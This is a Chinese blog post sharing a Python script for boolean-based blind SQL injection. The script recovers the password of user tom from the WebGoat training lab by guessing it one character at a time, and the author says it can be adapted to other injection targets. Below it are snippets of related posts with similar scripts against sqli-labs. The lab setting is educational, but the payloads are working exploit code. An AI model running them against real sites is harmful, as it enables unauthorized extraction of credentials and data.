python实现sql盲注

最新推荐文章于 2024-04-07 05:35:29 发布
最新推荐文章于 2024-04-07 05:35:29 发布
阅读量795 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: WebGoat python # 注入 文章标签: python sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/elephantxiang/article/details/114272471
本文分享了一段Python代码,用于通过SQL布尔盲注技术获取WebGoat SQL Injection (advanced)第5页用户tom的密码。代码使用requests库进行HTTP请求,并通过逐位猜测的方式实现了密码的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

背景介绍

本文这段python代码之前发布在我的博客WebGoat (A1) SQL Injection (advanced)中,用于通过sql布尔盲注获取WebGoat SQL Injection (advanced)第5页的用户tom的密码。

代码比较简单 ,这里单独拎出来主要是为了自己以后查阅方便。如果遇到其他注入问题,可以简单修改本脚本。如果以后代码有较大优化,会更新本文。

代码

import requests


url = "http://192.168.101.16:8222/WebGoat/SqlInjectionAdvanced/challenge"
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36","Cookie": "JSESSIONID=VjGdZj9IvzWQ9BJFIEar2--CEun-GVI0GnBVU7nE",}
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、特殊字符
answer = ''

for i in range(1,24):
    for c in keylist:
        payload = "tom' and substring(password,"+str(i)+",1)='"+c+"'-- ss"     #用substring逐位猜测密码
        formdata = {
        "username_reg":payload,
        "email_reg":"123@123.com",
        "password_reg":"12",
        "confirm_password_reg":"12",
        }
        response = requests.put(url, data = formdata, headers = headers)       #本题用的PUT方法传输客户端参数,如果遇到其他题目用POST方法,则改为requests.post
        if response.text.find("already exists") != -1:                         #猜对了的话返回结果会包含already exists
            answer = answer+c
            break
print(answer)                                                                  #打印结果

顺便感叹一下requests模块真好用。

我这里用的是python3,因为python3自带requests模块了,python2我看网上说也支持,但应该是要自己安装的。

sqlpython
yy2013
10-07 540
写一款工具,可以用来进行sql 前提: 数据库是mysql工具中使用的sql语句: 判断表是否存在: (select count(*) from tablename)>0 判断列是否存在:(select count(*) from tablename where 列名=)>0 猜字段中记录长度 ;and (select top 1 len(字段名) from 数据
SQLpython代码
最新发布
夏炎正好眠
02-13 569
布尔和时间的代码
基于pythonsql入脚本
03-04
适合刚学pythonsql入的人 import urllib2 import re
sqlpython脚本
weixin_48266255的博客
08-29 561
【代码】sqlpython脚本。
python-
qq_41232519的博客
04-22 441
import requests import time #目标url url = 'http://192.168.8.152/sql/Less-1/?id=1' #查库语句 database = 'select schema_name from information_schema.schemata' #查当前表语句 table = 'select table_name from infor...
python编写的sql
10-28
python编写的sql
Python实现SQL技术详解与脚本应用
资源摘要信息:"该文件标题为'布尔.py_sqlpython_',描述为'一个简单的sqlpython脚本,其中语句需要根据环境条件做改变'。文件标签为'sqlpython'。压缩包子文件的文件名称为'布尔.py'。" ...
Python实现SQL基础操作教程
根据给定的文件信息,这里将详细介绍标题中“python.zip”和描述中提到的“SQL的基础操作脚本(python)”以及“python”标签的相关知识点。 首先,“python.zip”表明这是一个使用Python语言编写的压缩文件。...
python实现sql时间
箭雨镜屋
04-26 1141
一、python代码 二、使用方法 三、测试
布尔.py_sqlpython_
10-03
在这个场景中,我们关的是一个名为"布尔.py"的Python脚本,它显然是用于演示或执行SQL的工具。 在SQL中,攻击者通常不能直接看到查询结果,而是必须依赖于应用程序对查询成功或失败的间接响应。例如...
sql 布尔 python脚本实现
sophia9301的博客
10-12 7777
渣渣一枚,把学习sql入过程中遇到的一些问题记录下来,以供日后参考。 按照网上教程入时发现过滤了union = < > ,顿时就一脸懵逼,因为不会构造sql语句,更不会绕过,最后在师父的指导下,首先通过手工入,入出了数据库名及长度。 1.数据库名长度: http://XXX.XXX.XX/sql.php? id=345’ and length(database()) like 1 an
爱上python探测脚本
dfdhxb995397的博客
09-13 194
  本文转自:i春秋论坛 前言:   最近在学python,做了个的简单的跑用户的脚本,仅做个记录。   sqmap也有不灵的时候,有时需要根据情况自写脚本探测   正文:   本地用大表姐给的sql和php文件搭建了个布尔的靶机   另外感谢大表姐的指导。   稍作解释:入语句里用%s占位,等待在for循里面依次判断长度 [App...
python substr_python
weixin_39695306的博客
11-27 152
给大家来一份python的代码我自己改了一些内容,到时候我把其封装成为.exe文件,或者.apk文件,再把资源发出来,接下来是代码 import requests# 爆数据库长度def db_length(url,s): db_length = 0 for i in range(1, 20): db_payload = "2%s and (length(da...
sql脚本
、moddemod
06-14 1045
# moddemod # 2019/6/13 # 8:23 # PyCharm import requests import re """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" """ base_url = "http://127.0.0.1/sqli-labs/Less-8/?id=1" class Blind(object...
python实现sql宽字节入+布尔
箭雨镜屋
05-01 623
一、意点 本文代码是对着pikachu漏洞靶场的宽字节入关卡开发的,代码中的payload和参数都基于此,使用本文代码需要修改payload和部分参数,具体见代码释 比起单纯的布尔 二、代码 三、使用 四、测试 ...
Python自动化sql入:布尔_布尔脚本
2401_83739411的博客
04-07 1318
学好 Python 不论是就业还是做副业赚钱都不错,但要学会 Python 还是要有一个学习规划。最后大家分享一份全套的 Python 学习资料,给那些想学习 Python 的小伙伴们一点帮助!
比二分法更OK的多线程(python脚本)
jpygx123的博客
11-21 1524
 废话不多说直接上代码: import threading import requests user_agent = [ "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.36 Safari/536.5", "Mozilla/5...
python解决和延迟入笔记
qq_43571759的博客
03-15 1085
python解决和延迟入笔记 requests模块 要用python解决这一问题需要了解request这个模块,我下载的是pycharm所以自带这个模块不用安装,需要安装的话 pip install requests pip命令执行就能安装成功,然后是关于requests模块的一些函数: get请求 post请求 res=request.get(url,params=dat...
SQLpython脚本自动化
菜鸟学安全的博客
12-18 1964
sql无法使用sql语句入,需要大量的判断语句或者延时入。这样手动入方式比较慢,手动发现入点后可以使用python编写脚本入。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值